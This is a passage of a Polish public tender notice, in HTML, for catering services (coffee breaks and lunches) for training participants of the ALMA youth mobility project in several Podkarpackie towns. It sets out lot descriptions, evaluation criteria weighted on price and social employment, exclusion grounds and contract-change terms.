1. Przedmiotem zamówienia jest zapewnienie usługi cateringowej: przygotowania, dostarczenia i wydania posiłków w formie: przerwy kawowej oraz jednodaniowego lunchu dla Uczestników Projektu „Podkarpacka Inicjatywa ALMA – europejskie mobilności młodych” – biorących udział w 30-dniowym cyklu kursów i szkoleń.<br/>2. Usługa realizowana będzie sukcesywnie i adekwatnie do prowadzonych naborów uczestników projektu i realizowanych dla nich działań szkoleniowych.<br/>3. Usługa realizowana będzie w dni robocze, wyłączając dni ustawowo wolne od pracy, średnio dwa razy w tygodniu przez 30 dni roboczych dla jednej grupy szkoleniowej.<br/>4. Dokładny termin i adres realizacji szkolenia, a tym samym cateringu, będzie podawany każdorazowo przez Zamawiającego na maksymalnie 7 dni przed datą rozpoczęcia szkolenia.<br/>5. Godziny dostarczenia posiłków zostaną każdorazowo, na bieżąco uzgodnione z Wykonawcą z minimalnie 2-dniowym wyprzedzeniem.<br/>6. Realizacja zamówienia będzie sukcesywnie rozłożona w czasie w okresie realizacji projektu tj. od dnia podpisania umowy z Wykonawcą przez kolejnych 15 miesięcy kalendarzowych.<br/>7. Maksymalna liczba cateringów to 1080 szt.<br/>8. Usługa będzie realizowana na terenie miasta Mielec. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55520000-1 - Usługi dostarczania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <p class="mb-0">55320000-9 - Usługi podawania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wszystkie oferty nie podlegające odrzuceniu oceniane będą według kryteriów opisanych niżej.<br/>Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>1) Kryterium: Cena – waga 70 %.<br/>2) Kryterium: Zatrudnienie przez wykonawcę osoby lub osób wymienionych w katalogu określonym w art.96 ust. 2 pkt 2 ustawy Pzp - waga 30 %.<br/><br/>Ad. 1) Kryterium: Cena – waga 70 %.<br/>W tym kryterium można otrzymać najwięcej 70 punktów.<br/>Liczba punktów w kryterium zostanie przyznana zgodnie z poniższym wzorem:<br/>Najniższa cena spośród ofert niepodlegających odrzuceniu<br/>---------------------------------------------------------------------------------------- X 70 % x 100 = ….… pkt<br/>Cena badanej oferty brutto<br/><br/>Ad. 2) Kryterium: Zatrudnienie przez wykonawcę osoby lub osób wymienionych w katalogu określonym w art. 96 ust. 2 pkt 2) ustawy Pzp - waga 30 %.<br/>W tym kryterium można otrzymać najwięcej 30 punktów.<br/>Liczba punktów w tym kryterium zostanie przyznania w następujący sposób:<br/>Jeżeli Wykonawca na czas realizacji przedmiotu zamówienia zatrudni do obsługi przedmiotu zamówienia na podstawie umowy o pracę lub umowy cywilno-prawnej:<br/>a) 2 lub więcej osób wymienionych w katalogu z art. 96 ust. 2 pkt 2 ustawy Pzp – oferta otrzyma 30 punktów,<br/>b) 1 osobę wymienioną w katalogu z art. 96 ust. 2 pkt 2 ustawy Pzp – oferta otrzyma 15 punktów,<br/>c) Jeżeli Wykonawca nie zatrudni żadnej osoby wymienionej w katalogu z art. 96 ust. 2 pkt 2 ustawy Pzp – oferta otrzyma 0 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie przez wykonawcę osoby lub osób wymienionych w katalogu określonym w art. 96 ust.2 pkt 2 ustawy Pzp</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest zapewnienie usługi cateringowej: przygotowania, dostarczenia i wydania posiłków w formie: przerwy kawowej oraz jednodaniowego lunchu dla Uczestników Projektu „Podkarpacka Inicjatywa ALMA – europejskie mobilności młodych” – biorących udział w 30-dniowym cyklu kursów i szkoleń.<br/>2. Usługa realizowana będzie sukcesywnie i adekwatnie do prowadzonych naborów uczestników projektu i realizowanych dla nich działań szkoleniowych.<br/>3. Usługa realizowana będzie w dni robocze, wyłączając dni ustawowo wolne od pracy, średnio dwa razy w tygodniu przez 30 dni roboczych dla jednej grupy szkoleniowej.<br/>4. Dokładny termin i adres realizacji szkolenia, a tym samym cateringu, będzie podawany każdorazowo przez Zamawiającego na maksymalnie 7 dni przed datą rozpoczęcia szkolenia.<br/>5. Godziny dostarczenia posiłków zostaną każdorazowo, na bieżąco uzgodnione z Wykonawcą z minimalnie 2-dniowym wyprzedzeniem.<br/>6. Realizacja zamówienia będzie sukcesywnie rozłożona w czasie w okresie realizacji projektu tj. od dnia podpisania umowy z Wykonawcą przez kolejnych 15 miesięcy kalendarzowych.<br/>7. Maksymalna liczba cateringów to 1080 szt.<br/>8. Usługa będzie realizowana na terenie miasta Stalowa Wola. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55520000-1 - Usługi dostarczania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <p class="mb-0">55320000-9 - Usługi podawania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wszystkie oferty nie podlegające odrzuceniu oceniane będą według kryteriów opisanych niżej.<br/>Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>1) Kryterium: Cena – waga 70 %.<br/>2) Kryterium: Zatrudnienie przez wykonawcę osoby lub osób wymienionych w katalogu określonym w art.96 ust. 2 pkt 2 ustawy Pzp - waga 30 %.<br/><br/>Ad. 1) Kryterium: Cena – waga 70 %.<br/>W tym kryterium można otrzymać najwięcej 70 punktów.<br/>Liczba punktów w kryterium zostanie przyznana zgodnie z poniższym wzorem:<br/>Najniższa cena spośród ofert niepodlegających odrzuceniu<br/>---------------------------------------------------------------------------------------- X 70 % x 100 = ….… pkt<br/>Cena badanej oferty brutto<br/><br/>Ad. 2) Kryterium: Zatrudnienie przez wykonawcę osoby lub osób wymienionych w katalogu określonym w art. 96 ust. 2 pkt 2) ustawy Pzp - waga 30 %.<br/>W tym kryterium można otrzymać najwięcej 30 punktów.<br/>Liczba punktów w tym kryterium zostanie przyznania w następujący sposób:<br/>Jeżeli Wykonawca na czas realizacji przedmiotu zamówienia zatrudni do obsługi przedmiotu zamówienia na podstawie umowy o pracę lub umowy cywilno-prawnej:<br/>a) 2 lub więcej osób wymienionych w katalogu z art. 96 ust. 2 pkt 2 ustawy Pzp – oferta otrzyma 30 punktów,<br/>b) 1 osobę wymienioną w katalogu z art. 96 ust. 2 pkt 2 ustawy Pzp – oferta otrzyma 15 punktów,<br/>c) Jeżeli Wykonawca nie zatrudni żadnej osoby wymienionej w katalogu z art. 96 ust. 2 pkt 2 ustawy Pzp – oferta otrzyma 0 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie przez wykonawcę osoby lub osób wymienionych w katalogu określonym w art. 96 ust.2 pkt 2 ustawy Pzp</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest zapewnienie usługi cateringowej: przygotowania, dostarczenia i wydania posiłków w formie: przerwy kawowej oraz jednodaniowego lunchu dla Uczestników Projektu „Podkarpacka Inicjatywa ALMA – europejskie mobilności młodych” – biorących udział w 30-dniowym cyklu kursów i szkoleń.<br/>2. Usługa realizowana będzie sukcesywnie i adekwatnie do prowadzonych naborów uczestników projektu i realizowanych dla nich działań szkoleniowych.<br/>3. Usługa realizowana będzie w dni robocze, wyłączając dni ustawowo wolne od pracy, średnio dwa razy w tygodniu przez 30 dni roboczych dla jednej grupy szkoleniowej.<br/>4. Dokładny termin i adres realizacji szkolenia, a tym samym cateringu, będzie podawany każdorazowo przez Zamawiającego na maksymalnie 7 dni przed datą rozpoczęcia szkolenia.<br/>5. Godziny dostarczenia posiłków zostaną każdorazowo, na bieżąco uzgodnione z Wykonawcą z minimalnie 2-dniowym wyprzedzeniem.<br/>6. Realizacja zamówienia będzie sukcesywnie rozłożona w czasie w okresie realizacji projektu tj. od dnia podpisania umowy z Wykonawcą przez kolejnych 15 miesięcy kalendarzowych.<br/>7. Maksymalna liczba cateringów to 1080 szt.<br/>8. Usługa będzie realizowana na terenie miasta Lubaczów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55520000-1 - Usługi dostarczania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <p class="mb-0">55320000-9 - Usługi podawania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wszystkie oferty nie podlegające odrzuceniu oceniane będą według kryteriów opisanych niżej.<br/>Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>1) Kryterium: Cena – waga 70 %.<br/>2) Kryterium: Zatrudnienie przez wykonawcę osoby lub osób wymienionych w katalogu określonym w art.96 ust. 2 pkt 2 ustawy Pzp - waga 30 %.<br/><br/>Ad. 1) Kryterium: Cena – waga 70 %.<br/>W tym kryterium można otrzymać najwięcej 70 punktów.<br/>Liczba punktów w kryterium zostanie przyznana zgodnie z poniższym wzorem:<br/>Najniższa cena spośród ofert niepodlegających odrzuceniu<br/>---------------------------------------------------------------------------------------- X 70 % x 100 = ….… pkt<br/>Cena badanej oferty brutto<br/><br/>Ad. 2) Kryterium: Zatrudnienie przez wykonawcę osoby lub osób wymienionych w katalogu określonym w art. 96 ust. 2 pkt 2) ustawy Pzp - waga 30 %.<br/>W tym kryterium można otrzymać najwięcej 30 punktów.<br/>Liczba punktów w tym kryterium zostanie przyznania w następujący sposób:<br/>Jeżeli Wykonawca na czas realizacji przedmiotu zamówienia zatrudni do obsługi przedmiotu zamówienia na podstawie umowy o pracę lub umowy cywilno-prawnej:<br/>a) 2 lub więcej osób wymienionych w katalogu z art. 96 ust. 2 pkt 2 ustawy Pzp – oferta otrzyma 30 punktów,<br/>b) 1 osobę wymienioną w katalogu z art. 96 ust. 2 pkt 2 ustawy Pzp – oferta otrzyma 15 punktów,<br/>c) Jeżeli Wykonawca nie zatrudni żadnej osoby wymienionej w katalogu z art. 96 ust. 2 pkt 2 ustawy Pzp – oferta otrzyma 0 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie przez wykonawcę osoby lub osób wymienionych w katalogu określonym w art. 96 ust.2 pkt 2 ustawy Pzp</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest zapewnienie usługi cateringowej: przygotowania, dostarczenia i wydania posiłków w formie: przerwy kawowej oraz jednodaniowego lunchu dla Uczestników Projektu „Podkarpacka Inicjatywa ALMA – europejskie mobilności młodych” – biorących udział w 30-dniowym cyklu kursów i szkoleń.<br/>2. Usługa realizowana będzie sukcesywnie i adekwatnie do prowadzonych naborów uczestników projektu i realizowanych dla nich działań szkoleniowych.<br/>3. Usługa realizowana będzie w dni robocze, wyłączając dni ustawowo wolne od pracy, średnio dwa razy w tygodniu przez 30 dni roboczych dla jednej grupy szkoleniowej.<br/>4. Dokładny termin i adres realizacji szkolenia, a tym samym cateringu, będzie podawany każdorazowo przez Zamawiającego na maksymalnie 7 dni przed datą rozpoczęcia szkolenia.<br/>5. Godziny dostarczenia posiłków zostaną każdorazowo, na bieżąco uzgodnione z Wykonawcą z minimalnie 2-dniowym wyprzedzeniem.<br/>6. Realizacja zamówienia będzie sukcesywnie rozłożona w czasie w okresie realizacji projektu tj. od dnia podpisania umowy z Wykonawcą przez kolejnych 15 miesięcy kalendarzowych.<br/>7. Maksymalna liczba cateringów to 1080 szt.<br/>8. Usługa będzie realizowana na terenie miasta Lesko. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55520000-1 - Usługi dostarczania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <p class="mb-0">55320000-9 - Usługi podawania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wszystkie oferty nie podlegające odrzuceniu oceniane będą według kryteriów opisanych niżej.<br/>Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>1) Kryterium: Cena – waga 70 %.<br/>2) Kryterium: Zatrudnienie przez wykonawcę osoby lub osób wymienionych w katalogu określonym w art.96 ust. 2 pkt 2 ustawy Pzp - waga 30 %.<br/><br/>Ad. 1) Kryterium: Cena – waga 70 %.<br/>W tym kryterium można otrzymać najwięcej 70 punktów.<br/>Liczba punktów w kryterium zostanie przyznana zgodnie z poniższym wzorem:<br/>Najniższa cena spośród ofert niepodlegających odrzuceniu<br/>---------------------------------------------------------------------------------------- X 70 % x 100 = ….… pkt<br/>Cena badanej oferty brutto<br/><br/>Ad. 2) Kryterium: Zatrudnienie przez wykonawcę osoby lub osób wymienionych w katalogu określonym w art. 96 ust. 2 pkt 2) ustawy Pzp - waga 30 %.<br/>W tym kryterium można otrzymać najwięcej 30 punktów.<br/>Liczba punktów w tym kryterium zostanie przyznania w następujący sposób:<br/>Jeżeli Wykonawca na czas realizacji przedmiotu zamówienia zatrudni do obsługi przedmiotu zamówienia na podstawie umowy o pracę lub umowy cywilno-prawnej:<br/>a) 2 lub więcej osób wymienionych w katalogu z art. 96 ust. 2 pkt 2 ustawy Pzp – oferta otrzyma 30 punktów,<br/>b) 1 osobę wymienioną w katalogu z art. 96 ust. 2 pkt 2 ustawy Pzp – oferta otrzyma 15 punktów,<br/>c) Jeżeli Wykonawca nie zatrudni żadnej osoby wymienionej w katalogu z art. 96 ust. 2 pkt 2 ustawy Pzp – oferta otrzyma 0 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie przez wykonawcę osoby lub osób wymienionych w katalogu określonym w art. 96 ust.2 pkt 2 ustawy Pzp</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia z postępowania (art. 125 ust. 1 Pzp) – np. zgodnie z Załącznikiem nr 4 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>2. Zamawiający nie żąda podmiotowych środków dowodowych składanych na wezwanie Zamawiającego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie żąda przedmiotowych środków dowodowych</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda przedmiotowych środków dowodowych <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>a) Aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 125 ust. 1 Pzp (że Wykonawca nie podlega wykluczeniu z postępowania);<br/>b) Jeżeli jest to konieczne – pełnomocnictwo;<br/>c) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców - odpowiedni dokument ustanawiający pełnomocnika (art. 58 Pzp);<br/>d) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, aktualne na dzień składania ofert oświadczenie, że Wykonawca nie podlega wykluczeniu składa każdy z Wykonawców wspólnie ubiegających się o zamówienie;<br/>e) Zamawiający żąda wskazania przez Wykonawcę, w ofercie, części zamówienia, których wykonanie zamierza powierzyć podwykonawcom, oraz podania nazw ewentualnych podwykonawców, jeżeli są już znani.<br/>f) Do oferty należy dołączyć wszystkie wymagane w ustawie i SWZ oświadczenia i dokumenty w formie elektronicznej lub w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.<br/>g) UWAGA: Zamawiający dopuszcza składanie ofert częściowych na wybraną przez Wykonawcę liczbę części. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. Do oferty należy dołączyć stosowne pełnomocnictwo w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę lub osoby upoważnione do składania oświadczeń woli każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3. W formularzu OFERTA w miejscu „nazwa i adres wykonawcy” należy wpisać dane dotyczące wszystkich podmiotów wspólnie ubiegających się o udzielenie zamówienie, a nie tylko pełnomocnika.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5. Przed podpisaniem umowy od Wykonawców ubiegających się wspólnie o zamówienie publiczne, których oferta została wybrana Zamawiający będzie żądać umowy regulującej ich współpracę.<br/>6. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7. Powyższe zapisy dotyczą też wspólników spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z art. 9 zał. nr 2 do SWZ - Wzorze umowy:<br/>1. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w zakresie dotyczącym: <br/>1) wynagrodzenia - w przypadku: <br/>a) wystąpienia którejkolwiek ze zmian przepisów wskazanych w art. 436 pkt 4 lit. b) ustawy Pzp tj. zmiany: <br/>1) stawki podatku od towarów i usług oraz podatku akcyzowego, <br/>2) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, <br/>3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, <br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych - jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. <br/>b) zrekrutowania mniejszej ilości Uczestników i przeprowadzenia mniejszej niż zakładana pierwotnie ilości grup objętych cateringiem, z zastrzeżeniem, iż zmiana ta nie przekroczy wartości 50 % zakładanego pierwotnie zakresu,<br/>2) zakresu przedmiotu umowy w przypadku zrekrutowania mniejszej ilości Uczestników i przeprowadzenia mniejszej niż zakładana pierwotnie ilości grup szkoleń, a co za tym idzie cateringów,<br/>3) zmiany terminu realizacji przedmiotu umowy w przypadku przedłużenia się procedury o udzielenie zamówienia publicznego uniemożliwiającego realizację przedmiotu umowy w terminach wymienionych w Ogłoszeniu o zamówieniu i treści umowy, w sytuacji gdy procedura udzielania zamówienia tj. okres od ogłoszenia zamówienia do wyboru oferty najkorzystniejszej trwać będzie dłużej niż 45 dni kalendarzowych od ogłoszenia w BZP, odpowiednio o liczbę dni przekraczających w/w okres, o którą przedłużyła się procedura – pod warunkiem, że realizacja zamówienia w pierwotnych terminach jest niemożliwa.<br/>4) zmiany terminu realizacji przedmiotu umowy w przypadkach:<br/>- gdy będzie tego wymagała prawidłowa realizacja projektu;<br/>- wystąpienia decyzji administracyjnych (decyzje władz publicznych, zmiany obowiązującego prawa, oczekiwanie na nieprzewidziane wcześniej a konieczne wyniki ekspertyz, wyroki sądowe itp.) uniemożliwiających wykonanie przedmiotu umowy lub jego części w pierwotnych terminach;<br/>- zaistnienia zdarzenia nieprzewidzianego lub zdarzeń losowych uniemożliwiających realizację przedmiotu zamówienia w terminach 